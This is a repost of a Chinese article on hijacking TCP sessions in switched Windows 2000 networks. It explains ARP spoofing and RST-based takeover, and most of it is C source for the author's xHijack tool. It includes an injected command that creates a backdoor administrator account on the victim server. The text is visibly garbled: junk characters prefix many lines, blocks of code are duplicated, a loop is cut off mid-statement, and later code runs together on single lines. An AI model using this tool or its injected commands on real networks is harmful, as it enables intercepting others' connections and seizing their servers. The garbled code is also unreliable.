再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
9 \+ P* `- H& t( f/ {2 @7 j0 bHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
第二步是ARP欺骗，具体原理我就不说了。
& h3 b3 E* o% ~+ q) t/ R4 a7 R第三步就是开始劫持啦。

" l7 ^% [4 a: t5 Y3 f0 q0 ]我写了个程序xHijack可以实现第二、三步功能，使用如下:
, e1 y7 h! D: q; P: r
Usage: xHijack ServerSide ClientSide
4 g  d# [" O) w+ b, n- D% ]% Q
6 ?: ?- J+ j3 {; @下面根据三种不同的情况分别说明如何输入参数：
' L0 c7 X8 [3 d& A0 O: s<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
3 M! l% ^9 ^; K3 V$ K% M2 a假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
# W: Q  S. h# Z( [( vc:\>xHijack 192.168.0.2 192.168.0.3
劫持前数据流程：server <--> client
! q$ E6 y9 Y5 ~/ }# @% P劫持后数据流程：server <--> hijacker <--> client
6 @$ O4 B. n* O0 P
% Y7 s$ B1 m1 P* G<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
4 A* U) J3 s0 D. X& u9 T假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
xHijack 202.202.202.2 202.202.202.1
劫持前数据流程：server <--> gw <--> routes <--> client
劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client

<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
3 W. C! d( M* h* _, S假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
xHijack 192.168.0.1 192.168.0.2
8 x6 }! H: [2 u! _0 \6 v- B" S劫持前数据流程：client <--> gw <--> routes <--> server
劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server

输入两个参数后，会提示你选择网卡，然后会提示
/ f& c5 u  t8 M" @l        <-- List all connections
$ a4 u, p0 }! O5 b7 Zr x       <-- Reset the number x connection
( F2 p+ D* b/ Z# J# Hw x       <-- Watch the number x connection
h x command   <-- Hijack the number x connection to execute command

* H) u( c8 v: ~8 L+ S# \& [8 A4 ulist、reset、watch命令我就不解释了。
# ~  V, F# j1 E  x$ ]假如现在有如下连接
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
我们想要劫持这个连接运行我们的命令，输入
xHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
4 |0 I# a' G+ N2 ?+ @为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
: b3 |9 ^9 ]% I( d+ Y/ F! vpnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
. i' d3 `& t0 E$ ?都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。
. S( E; |( k4 K* p8 [( N& m" I
: |" p- I' s( j劫持的流程如下：
" H% t  K' S( m<1>伪装成Server给Client发一个rst包
<2>伪装成Client给Server发了一个数据包
5 D! X: b* ~6 k- h) a$ v) i2 k* X1 L<3>Server回一个ACK包给client
) l+ v! f. _' ^1 G* V$ N: f8 p, U<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server
/ u+ H$ ]& ]6 T
这样的话，我们只能发一个伪造的包，但我想已经足够了。
想要一直劫持那个连接也可以，如下
<1>伪装成Server给Client发一个rst包
<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
( k% J. `& T1 N0 U<3>伪装成Client给Server发了一个数据包
<4>Server回一个ACK包给client
<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
/ v0 d0 R1 Y$ E/ D: F; H% B4 g, v<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。
& x0 L$ U* e+ u$ u3 v
; B' H  C' T% I不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。
1 |, H+ C% R3 ~2 t7 m( K( e

: e' x* c0 z! h" h" a% l刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
还请各位多多指点。

. E' v% M2 T' b: KBTW:我没有空间，编译好的程序没地方放：（



参考资料
<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377


' m$ r" y5 ^' \, y4 E. j: w以下是程序代码
1 T! ?9 \: H+ \1 o! |----------------------------------------------------------------------
/*-----------------------------------------------------------------------------
& @7 A% x3 l* YFile      : xHijack.c
Version      : 1.0
Create at    : 2002/8/12
Last modifed at  : 2002/8/19
1 r+ N! {+ `1 r" a- NAuthor      : eyas
9 A; \* b  w7 A" i+ ~; x4 UEmail      : ey4s@21cn.com
* Z% I& m: w9 m3 r4 @HomePage    : www.ey4s.org
感谢refdom和shotgun发布的源代码，使我获益非浅。
$ p6 ?) P% I9 MIf you modify the code, or add more functions, please email me a copy.

' N0 Q% v. {; J" ~- X; i4 H: U备注:
' g  }, l$ T* G& ]/ {7 t<>没有考虑IP头、TCP头超过20字节的情况
- I. h0 H" u0 h/ p* R  x<>没有考虑数据包分片的情况
<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
2 [% T* a5 y+ ~) Y题了。
1 M) F0 O5 g8 \7 w  @$ B9 h# S
也许下一版本会修正这些问题，也许不会有下一版本了。

-----------------------------------------------------------------------------*/
4 n( }* l) A' v9 V8 \#include
. w3 Z& j8 i6 I$ R4 y& n' O#include
; j$ \; B* a( D) d9 O#include
" R0 S- p% M. J( J" _#include
  V; p' c" j% u0 D( G9 d3 [8 x#include
1 O2 I# i6 L% v# z# F4 r# i6 I/ _#include
5 E5 p' M+ z6 ~9 N: r#include
' p8 s% [* D: A# M+ s/ ~' V
#pragma comment (lib, "packet")
8 d) g8 T6 _$ `9 l$ [5 R1 s#pragma comment (lib, "iphlpapi")
' L7 b; e0 s# U1 [6 k4 n#pragma comment (lib, "ws2_32")
; e/ {6 p! d  T3 M2 I6 f
$ S6 `% f. f+ |* ^#define Max_Num_Adapter 10
#define Max_Num_IPAddr  5
+ e( P8 _. T9 d+ j$ L#define EPT_IP      0x0800      /* type: IP  */
& [9 R4 g( a* R! C6 t+ O! g4 \9 q' ^#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
: m" |; c$ e- h- C#define EPT_ARP      0x0806      /* type: ARP */
( ~9 i. I: \' y( ~* A. o
#define  ACTION_NONE    0
#define  ACTION_WATCH  1
#define  ACTION_RESET  2
- f* K% r" k. e* v; L& h1 @#define ACTION_HIJACK  3

/*以1字节对齐*/
) ~9 |/ w2 a3 ^8 @* o+ o& R$ |8 d#pragma pack(1)
# [8 S5 z+ M. M3 v0 c* ]/ rtypedef struct _ehhdr
{
% |0 i! e3 o- }- C  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
  unsigned short  EthernetType;
* l( i- E5 Z; x; D5 ~) U}EHHDR, *PEHHDR;

) K4 R! R' A$ h" Ntypedef struct _iphdr        //定义IP首部
7 b9 h! T$ d( M6 O* |' l; M{
5 R2 E7 [) L1 F/ p  unsigned char h_verlen;      //4位首部长度,4位IP版本号
% q4 j( c0 d5 P8 W/ U" {/ C: E  unsigned char tos;        //8位服务类型TOS
  unsigned short total_len;    //16位总长度（字节）
7 h9 H% G6 Q- k- F  unsigned short ident;      //16位标识
0 n: L& K" `; i' N: j& K. [  unsigned short frag_and_flags;  //3位标志位
  unsigned char ttl;        //8位生存时间 TTL
& w$ n) R" H7 c. u2 q8 f  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
  unsigned short checksum;    //16位IP首部校验和
  unsigned int sourceIP;      //32位源IP地址
7 t4 G3 e5 x4 i' y8 s# W  unsigned int destIP;      //32位目的IP地址
}IPHDR, *PIPHDR;
; |% `$ Z3 J6 ~, m
typedef struct _tcphdr        //定义TCP首部
{
1 P+ V. A3 L2 F  USHORT th_sport;        //16位源端口
  USHORT th_dport;        //16位目的端口
  unsigned int th_seq;      //32位序列号
  unsigned int th_ack;      //32位确认号
- Y1 t4 D! t* J2 k  unsigned char th_lenres;    //4位首部长度/6位保留字
" ]6 ~- O: a. q4 J9 b9 l" G+ |; P  unsigned char th_flag;      //6位标志位
  USHORT th_win;          //16位窗口大小
0 h9 U# k/ n7 |* Y  USHORT th_sum;          //16位校验和
  USHORT th_urp;          //16位紧急数据偏移量
$ _/ p/ i( V8 E}TCPHDR, *PTCPHDR;
9 ^. O8 ]8 }9 |2 W% J1 R/ A
0 |: g/ @2 P0 }/ w' p; F; h% Ttypedef struct _psdhdr        //定义TCP pseudo header
{               
6 q0 t* q# g- `  unsigned long saddr;
  unsigned long daddr;
& A! C' Z) K" ^) A; P, K/ I& H; C  char mbz;
. B$ F7 q7 Z( }- f1 t+ ?/ ]5 b! {  char ptcl;
  unsigned short tcpl;
  G) B4 b% S( `; R! i; z# `}PSDHDR, *PPSDHDR;
% z, E5 m; |8 k
typedef struct _arphdr
{
5 \! |  h3 J7 L8 H! c" N  unsigned short  HrdType;//硬件类型
: F& J0 g, f% W" y# I! S  unsigned short  ProType;//协议类型
& T( Q% i" N, O  unsigned char  HrdAddrlen;//硬件地址长度
5 N% Y& L+ T# ?  unsigned char  ProAddrLen;//协议地址长度
  unsigned short  op;//operation
  unsigned char  SourceMAC[6];/* sender hardware address */
  unsigned long  SourceIP;/* sender protocol address */
* K1 R8 _* C) u2 c3 ]* C4 `  unsigned char  DestMAC[6];/* target hardware address */
' \4 h( G' h# l1 f3 R+ A9 @- D  unsigned long  DestIP;/* target protocol address */
: Q8 f) h$ M! Y8 s}ARPHDR, *PARPHDR;

1 Q1 j) h+ T5 `4 c% ?, a2 o) ?typedef struct _ArpPacket
" w8 r: \+ T# t; v9 o4 u{
; U5 B- r7 e# l% b: `4 ~  EHHDR  ehhdr;
  ARPHDR  arphdr;
0 F% I* ]8 s* R1 m# u}ARPPACKET, *PARPPACKET;

typedef struct _tcppacket
( A8 ^" N7 r# E6 ?# P' \8 Z{
6 e+ }) q3 p: A! i) j  EHHDR  ehhdr;
  IPHDR  iphdr;
& `  r( D: H8 _  TCPHDR  tcphdr;
% r; o; E7 [' C7 K}TCPPACKET, *PTCPPACKET;
; b+ M* m! U# t% W8 ]
typedef struct _conninfo
5 R0 U" d6 `& ~/ x2 t+ d* ~2 s{
  DWORD  dwServerIP;
  USHORT  uServerPort;
- K4 @; ]0 l5 {  DWORD  dwClientIP;
2 C4 O1 C  h0 b6 H1 @9 E7 u  USHORT  uClientPort;
4 X! i2 R( l6 p1 h: g  DWORD  ident;//标识
( f& H3 {( k$ T+ {) l- \. |8 R  BOOL  bActive;
  struct  _conninfo  *Next;
8 I2 L% \) [" U  a/ m( I, ?- ^& d}CONNINFO, *PCONNINFO;

//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
# z/ h* b6 v: t4 J; q+ G        g_ClientSideIP,
        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
unsigned char  g_szClientSideMAC[6];
unsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
' b3 B) w; s6 p! M( fHANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
2 r3 O3 Q- |1 b2 R+ P7 _, yDWORD      g_ident;//节点标识，递增
' ]8 R6 ^# K0 D! W% hPCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
$ X! u. _6 `  t$ z! _        g_pConnHead = NULL,
  f. b* h6 w0 n4 k3 z  R4 G        g_pConnLast = NULL;
& a4 h% @9 N7 L0 z2 Q! N( H* Uchar      g_szSendPacketBuf[1514];
' l5 I4 z$ Z# e4 O' g3 \LPPACKET    g_lpSendPacket;
//函数
void      usage(void);
8 h8 T- x0 n& p1 ^& X; G# ^/ ]: O7 dvoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
! u( Q: ^% k2 T, `void      ListAllConnection();//列出当前所有的连接
1 s: f) k& k) l# B9 ~; wvoid      ResetActionAllFlag();
: S* l" n0 \4 j' X5 `) o/ D$ AUSHORT      checksum(USHORT *, int);
. B8 b1 i4 c+ U3 z( e# RBOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
7 g+ k" W( I. T. D3 j  }& ^& ZBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
* w6 F% L' J5 W, }BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
; Z! K8 L( `0 n5 a: j) sBOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
3 T/ g, X; L9 A2 ~% cDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
DWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
DWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
8 w8 l2 Q1 Q* w% \% C5 l+ XBOOL  WINAPI  CtrlEvent(DWORD);
* k. x& e5 \! c& d
* C% i6 Z5 S, T8 S$ o
; Q$ q2 \: B) o  ]7 X- c! F
1 ?! X7 E  P# F; zint main(int argc, char **argv)
{
  struct    bpf_stat stat;
# L9 Q- C, i$ m3 c! z/ C8 c  int      i;

4 R- L& x1 z3 M1 V  usage();
" J1 S% l( W7 B1 D& ^1 [9 @  if (argc != 3) return 0;
  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
1 @8 G* v/ z" s- y3 y  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
* A/ Y. {& d/ |5 ?4 Z# s0 }9 Y  g_lpAdapter = InitAdapter();
  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
: X5 S: d5 `# O7 w8 D& o; ^( N  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
/ X% L' x; C1 A0 P7 t4 C  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
/ ~5 e4 P) W: S3 ~+ |  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
) d; `( H( ?/ ?; ?  //create interface thread
3 }7 a8 |6 P. A- W* @: h- |  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
. a% ?' t7 e$ i+ f3 B9 i/ j* z, Y  //set console ctrl handle
  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
1 d1 P5 ]& d  \% }0 Q0 f  p2 @& O1 o    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
% m: B+ O* m! u    return 0;
  }
2 a" R/ w. }" n8 ^3 w  C  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
  else
$ A: j# m* A, P" n5 M; g. p+ v    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
$ E) y& C2 P/ p; ]5 }  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
  return 0;
}

//
% G; n# J" @# i% t# n//功能：重置所有于ACTION有关的标志
//

韩冰

unsigned int  g_ServerSideIP,
        g_ClientSideIP,
8 C/ M8 E4 }% r( @6 K        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
( b: V( h& n7 F4 P9 x        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
unsigned char  g_szClientSideMAC[6];
& \) s) ^7 t+ d9 Y5 |2 v' R  }- nunsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
! V7 E5 p- s+ I  o  h7 d1 c* F7 UHANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
: t/ q  Q9 V' m4 j) w" [& D8 F7 TDWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
DWORD      g_ident;//节点标识，递增
/ i" ?. [# p! J+ U- APCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
* B0 R7 @5 Z6 j        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
//函数
) H( X4 L% U/ |4 b& q: Tvoid      usage(void);
, B; |- ?( g% K" U2 _- Svoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
6 r' O; b; `3 {: U6 W- G1 @9 d- `void      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
: u8 f, u; K2 A: OUSHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
& _0 Y8 x) j( R, XBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
1 q( c, c8 G* r% H$ MLPADAPTER    InitAdapter();//初始化一些参数和全局变量
BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
DWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
4 _  [# m6 t$ y$ x; n2 G, qDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
/ d4 O3 \4 ?- \, K" A5 GBOOL  WINAPI  CtrlEvent(DWORD);



int main(int argc, char **argv)
+ z6 m8 w/ y6 m{
+ S$ |4 j2 j& }% c7 n: e& |8 _  struct    bpf_stat stat;
  int      i;

  usage();
  if (argc != 3) return 0;
  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
! W5 z( b8 j* a- f" j! @  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
  i = 1;
" |6 H. Y* A! d0 i$ O: B' J* G  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
, ?  k2 t5 |% P! I( _3 p" w  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
1 x1 y; c9 s, p8 y) y- E, m  //create interface thread
2 i" ^) F5 k. }9 `" _( y+ r  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
- d# R  ~1 A( X5 Z' u; T  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
) B4 {9 @( K  e, p, s- h/ i9 t    return 0;
  }
  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
7 ]3 [/ A) [8 q: k6 b8 p! c+ K  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
8 X! k2 a, W# ?+ `- Q& k1 b    printf("Warning: unable to get stats from the kernel!\n");
" v0 U0 m8 d& W5 x8 g  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
: P$ W2 q  B4 }$ u+ a  //free resource   
0 m' X# C, p2 P  PacketFreePacket(g_lpSendPacket);
4 W# `4 w( A4 @" f. u  PacketCloseAdapter(g_lpAdapter);
: s/ {; I  i4 C8 Z0 i) M$ y  return 0;
}

7 h4 R* U+ Z! ~$ N7 i' j, m7 T//
//功能：重置所有于ACTION有关的标志
//

韩冰

void ResetActionAllFlag()
{
  g_dwCtrlConn = 0;
  g_pCurrCtrlConn = NULL;
  g_dwAction = ACTION_NONE;
, U# @# V# v3 J}

$ K  d  T1 _) Z//
//功能：处理Ctrl+C和Ctrl+Break事件
//
BOOL WINAPI CtrlEvent(DWORD dwCtrlType)
{
  switch(dwCtrlType)
  {
    case CTRL_BREAK_EVENT:
, V* n: T% e4 K1 T! g0 ?      //reset action all flag
+ y/ U: i7 M( [4 O! x2 r" {2 z      ResetActionAllFlag();
      break;
5 t5 \5 V. [! w    case CTRL_C_EVENT:
4 i) ~2 D2 P1 t0 r      //terminate all thread
      TerminateThread(g_hThread[0], 0);
+ a! x0 \- }, e. S: B      TerminateThread(g_hThread[1], 0);
& J. U+ b, F2 F) `      TerminateThread(g_hThread[2], 0);
! }% ]& K$ I% T" E# y+ P8 P      TerminateThread(g_hThread[3], 0);
6 R% [: w* Q" ]; r      break;
    default:
. y0 O# b2 x1 g# v9 D5 ^      break;
0 K2 i% _5 Z3 m% a! R6 S( C  }
  return TRUE;
2 Q* _, ~' E1 m, S4 i) c$ [: [* P}

: E  f% A0 G4 b$ ^9 N1 I//
7 X, Z; d8 a$ H2 B. ~//功能：处理用户输入
//
7 e# r2 [) ]- c$ B3 k/ u6 h3 vDWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
8 p* a: g0 R: ?  G# w0 e( ?! q{
( M3 v" H6 B6 R( p# ?5 c  DWORD  i;
4 l' s0 E% v3 L. C  char  szBuff[16];

  C/ C8 @" q2 X2 }% P0 y' l. u; v  *lpCommandPos = 0;
  for(i=0; i<15, i代码比较乱
//
$ }$ h. F& b# MDWORD WINAPI InterfaceThread(LPVOID lp)
' {) W& q9 J; d0 M+ {9 [0 T{
  char  szHelp[] =  "l\t\t<-- List all connections\n"
            "r x\t\t<-- Reset the number x connection\n"
            "w x\t\t<-- Watch the number x connection\n"
            "h x command\t<-- Hijack the number x connection to execute command\n"
            "[Note]\n"
" o" M  ]% M1 c5 q! k2 u            "Ctrl+Break to clear all action\n"
            "Ctrl+C to exit\n";
, C- G# t( `& @  char  szPrompt[] = "\nxHijack>";
! k/ ^+ f" ~; I0 I5 j' r" Q  char  szBuffer[128];
+ X* f1 [! `* h8 k9 {8 U# I  DWORD  dwPos;
  PCONNINFO  pTmp;
' b' W# c8 M- w5 [8 P
  while(1)
+ j4 Q" ?  K+ E; ~9 G, W/ J1 B  {
0 g, g' N; R4 N' v2 _/ n! [    gets(szBuffer);//不考虑buffer overflow
    switch(szBuffer[0])
0 t5 x9 b  i& i' Z- n$ C    {
      case 'l':
+ e9 s* U4 D8 X3 z8 q      case 'L':
& c/ ~; c; v, E1 g4 }1 c        ListAllConnection();
        break;
      case 'r':
      case 'R':
        if(strlen(szBuffer) >2)
        {
/ r3 s1 R3 Z  c- c) H7 h          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_RESET;
1 l; G, b# M& d3 o        }
        else printf("%s", szHelp);
        break;
* t4 d  o6 B% V' ^0 W' g      case 'w':
      case 'W':
        if(strlen(szBuffer) > 2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
2 u) U2 x* R7 p. d* @8 k% R$ i          g_dwAction = ACTION_WATCH;
        }
        else printf("%s", szHelp);
        break;
      case 'h':
5 n1 I2 O  a( y" {; U+ `% t2 ~      case 'H'://h 1 xxx
) L5 ]" w) `3 o9 L7 i# j        if(strlen(szBuffer) > 5)
        {
/ t; w) q6 z; L3 W+ L, c$ _  L          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          //如果command第一个字符是'或"
: u* w8 B1 ~0 _          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
6 H, B4 K! T0 ], W          {
            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
; r$ n1 }1 t: L, p7 A7 s! t            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
          }
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
7 i" `$ Y& o5 f  Q          strcat(g_szCommand, "\x0D\x0A");
1 j, b* E. z! m# y& U3 t7 n* Y3 T          g_dwAction = ACTION_HIJACK;
& P7 g- ]2 |$ H& e' M% U% E! q* ~        }
# V- Y' n- C7 u4 R( q$ P        else printf("%s", szHelp);
! L" T8 ^9 D2 P. j) B; Y8 ?        break;
      default:
        printf("%s", szHelp);
        break;
    }//end of switch
# v, v# M9 @) j, m, Z    //find the specify ident's struct point
) z5 n& j* v8 I9 ^2 }( R, n' R    if( (g_dwCtrlConn) && (g_dwAction) )
    {
5 D& M7 y  n, r! {/ X* Y9 m      g_pCurrCtrlConn = NULL;
) n/ L7 S5 U: H      pTmp = g_pConnHead;
      while(pTmp)
      {
; j0 M. W( n2 F7 Y* i        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
3 l# q, ^3 q' a/ S! N4 A: V) O8 i# z; z        {
          g_pCurrCtrlConn = pTmp;
% T2 K' r  f3 @! v! o( U          break;
: l3 p, _, v/ s7 l, e6 L; q        }
6 v+ G6 C% c; N" S5 G- N& q        pTmp = pTmp->Next;
      }
3 \- E' C) z  Y( A# S$ P' P0 e# {      if(!g_pCurrCtrlConn)
      {
        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
. ]7 h1 @+ N: S: W# Y& M8 [' ~        //reset action all flag
$ k% ?' Q. J6 ]) x) ~        ResetActionAllFlag();      
3 |( c% x' F# l3 h) N      }
/ b) @8 V' ~' B9 X, w4 H    }
# K' B4 K# q% |5 N- c1 m" a! P4 _5 j    if(!g_dwCtrlConn) ResetActionAllFlag();
2 _- @- ~1 O1 K8 v* o    //显示当前用户所期望的动作
4 a) x% [  a, d; Y    printf("\nCurrentAction:");
    switch(g_dwAction)
/ r- S0 N# h; Q# F* \* O7 E) [4 O    {
      case ACTION_WATCH:
% n; n  V# r: w8 l        printf("ACTION_WATCH");
        break;
      case ACTION_RESET:
        printf("ACTION_RESET");
0 N, B9 t- ~2 s        break;
4 u: |0 o7 @0 v: f5 d* d      case ACTION_HIJACK:
6 J1 u! }- q% S! t0 h) W6 w( }6 W        printf("ACTION_HIJACK");
( ?6 u' G  {( o7 ~4 w- \# L        break;
& y$ u. f; |7 U      default:
        printf("ACTION_NONE");
        break;
1 ^! }$ @: I# D  k    }
0 i2 I4 ^. ]4 N% Q+ |! k6 O    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
' z- h6 v+ n. a8 N0 {( z  }//enf of while
7 ~/ V% ?4 D9 x4 |/ r  i1 J7 m  return 0;
}

韩冰

// : H+ \3 K) K* }! M+ [6 ]//功能：列出当前所有连接 // 2 C" a7 F9 Y7 \! U$ {3 s# V4 Wvoid ListAllConnection() 6 T/ u: T6 H' b- S; K{ PCONNINFO pTmp; ( K/ ~' s) K% Q8 ? SOCKADDR_IN saDest, saSource; pTmp = g_pConnHead; / \ W0 |" q$ p) D N while(pTmp) 2 b6 b( b& Z9 q0 V, Y# B { if(pTmp->bActive) + n# G( B6 S @) E: f. [" a4 a { saSource.sin_addr.s_addr = pTmp->dwServerIP; , p8 V8 d. j1 C saDest.sin_addr.s_addr = pTmp->dwClientIP; printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), 6 i1 p+ c. v5 K6 k' Q6 u8 c% L ntohs(pTmp->uServerPort)); printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); } , I0 I, }% j' l& d; N& p4 a7 V4 h pTmp = pTmp->Next; * X2 N, l! ^+ z8 l: f6 [: S } 4 A6 P8 Q2 T$ G5 @; v} : }& F0 o$ {/ M# Y5 H D4 B4 e* w // , b" w2 m: t: w9 {4 W. U" s//功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 // : }- G" g0 D1 g/ Q% W) i, j# |LPADAPTER InitAdapter() { $ M' r+ _) l/ a$ D5 M7 }0 r U LPADAPTER lpAdapter; static char AdapterList[Max_Num_Adapter][1024]; char szSelectAdapterName[512]; ( D2 O) ~1 p! _ WCHAR AdapterName[2048]; 8 b+ c/ Z% i8 B+ u# B" R! B WCHAR *temp,*temp1; ULONG AdapterLength = 1024; r7 T8 G) n( |+ O$ b, w int iAdapterNum = 0; # w: E$ k0 w0 P0 e4 ` ^2 U int iRetCode, i; int iAdapter = 0; ) m0 e' \0 W( s# i7 W+ ]) u2 S ULONG ulLen = 0; DWORD dwRet; 8 j# k- ]! R) R6 f' V! T PIP_ADAPTER_INFO pAdapterInfo = NULL, 